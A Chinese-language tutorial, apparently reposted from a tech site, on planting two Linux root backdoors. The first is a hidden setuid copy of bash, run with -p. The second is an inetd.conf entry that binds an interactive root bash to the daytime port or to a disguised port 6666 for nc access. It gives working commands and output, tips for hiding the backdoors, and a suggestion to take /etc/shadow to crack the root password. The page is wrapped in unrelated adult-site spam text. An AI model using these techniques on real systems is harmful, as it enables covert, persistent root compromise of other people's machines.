成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Linux后門的兩種姿勢(shì):suid shell與inetd后門

安全 黑客攻防 網(wǎng)站安全
本文主要講解了Linux后門的兩種姿勢(shì):suid shell與inetd后門。

前提:

你現(xiàn)在已經(jīng)是root用戶, 想留一個(gè)后門。

Linux后門的兩種姿勢(shì):suid shell與inetd后門

系統(tǒng)環(huán)境:

dawg:~# uname -a 
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1. SUID shell

首先, 先切換成為root用戶,并執(zhí)行以下的命令:

dawg:~# cp /bin/bash /.woot
dawg:~# chmod 4755 /.woot
dawg:~# ls -al /.woot
-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot

當(dāng)然, 你也可以起其他更具備隱藏性的名字,我想猥瑣并機(jī)智的你,肯定能想出很多好的名字的。文件前面的那一點(diǎn)也不是必要的,只是為了隱藏文件( 在文件名的最前面加上“.”,就可以在任意文件目錄下進(jìn)行隱藏) .

現(xiàn)在,做為一個(gè)普通用戶,我們來(lái)啟用這個(gè)后門:

fw@dawg:~$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
fw@dawg:~$ /.woot
.woot-2.05b$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
.woot-2.05b$

為什么不行呢?

因?yàn)?bash2 針對(duì) suid有一些護(hù)衛(wèi)的措施. 但這也不是不可破的:

.woot-2.05b$ /.woot -p 
.woot-2.05b# id 
uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)

使用-p參數(shù)來(lái)獲取一個(gè)root shell. 這個(gè)euid的意思是 effective user id(關(guān)于這些ID的知識(shí),可以戳這里)

這里要特別注意的是,作為一個(gè)普通用戶執(zhí)行這個(gè)SUID shell時(shí),一定要使用全路徑。

小知識(shí):

如何查找那些具有SUID 的文件:

dawg:~# find / -perm +4000 -ls

這時(shí)就會(huì)返回具有SUID位的文件啦。

2. 遠(yuǎn)程后門:利用 /etc/inetd.conf

我們使用vi來(lái)修改 /etc/inetd.conf 文件

原文件:

#chargen dgram udp wait root internal 
#discard stream tcp nowait root internal 
#discard dgram udp wait root internal 
#daytime stream tcp nowait root internal

修改為:

#discard stream tcp nowait root internal 
#discard dgram udp wait root internal 
daytime stream tcp nowait root /bin/bash bash -i

開(kāi)啟inetd:

dawg:~# inetd

如果要強(qiáng)制重啟inetd:

dawg:~# ps -ef | grep inetd
root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd
root 13769 13643 0 17:51 pts/1 00:00:00 grep inetd
dawg:~# kill -HUP 362

現(xiàn)在我們就可以用nc來(lái)爆菊了:

C:tools 
192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.77] 13 (daytime) open
bash: no job control in this shell
bash-2.05b# bash-2.05b#
bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
bash-2.05b# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

小貼士:

我們可以修改/etc/services文件,加入以下的東西:

woot 6666/tcp #evil backdoor service

然后修改/etc/inetd.conf :

woot stream tcp nowait root /bin/bash bash -i

我們可以修改成一些常見(jiàn)的端口,以實(shí)現(xiàn)隱藏。

小編感言: 其實(shí)下 /etc/shadow文件,爆破root的密碼才最保險(xiǎn)啊!

責(zé)任編輯:藍(lán)雨淚 來(lái)源: 網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室
相關(guān)推薦

2010-08-02 14:36:52

ICMPLinux

2010-09-13 15:06:36

2010-09-13 14:47:58

2010-09-13 14:34:55

2010-09-13 14:57:29

2010-09-13 15:14:03

2010-03-10 10:24:16

Linux ssh后門

2013-07-09 16:12:47

2020-06-18 08:18:35

密碼加密安全

2016-02-25 11:02:11

2014-05-23 09:56:27

2010-09-13 15:26:34

2011-11-25 15:34:33

2023-01-06 08:42:02

學(xué)習(xí)訓(xùn)練

2018-01-11 09:51:34

2013-06-19 10:03:42

2013-08-20 16:16:19

2010-01-15 10:32:40

2024-04-03 14:28:12

2010-01-14 20:57:59

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 紧缚调教一区二区三区视频 | 精品国产一区二区三区久久影院 | 亚洲人人 | 久久一二| 亚洲精品日韩在线 | 欧美日韩一区精品 | 久草在线影 | japanhd成人| 91天堂 | 精品久久伊人 | 黄色大片观看 | 色999日韩| 日韩中文字幕视频 | 99久热 | 久久综合一区二区三区 | 一级黄色大片 | 欧美在线视频一区 | 在线观看黄色电影 | 免费看片在线播放 | 在线观看亚洲专区 | yeyeav| 男女网站在线观看 | 欧美激情精品久久久久久 | h视频免费在线观看 | 本道综合精品 | 亚洲精品一区二区三区四区高清 | 99精品亚洲国产精品久久不卡 | 成人av网站在线观看 | 中文字幕在线不卡 | 亚洲成av人片在线观看无码 | 国产一区二区免费 | 欧美日韩高清 | 日韩www视频 | 欧美黑人狂野猛交老妇 | 天天av天天好逼 | 天天艹天天干天天 | 羞羞视频免费在线 | 亚洲高清视频在线观看 | 91香蕉视频在线观看 | 欧美性大战久久久久久久蜜臀 | 日日夜夜精品视频 |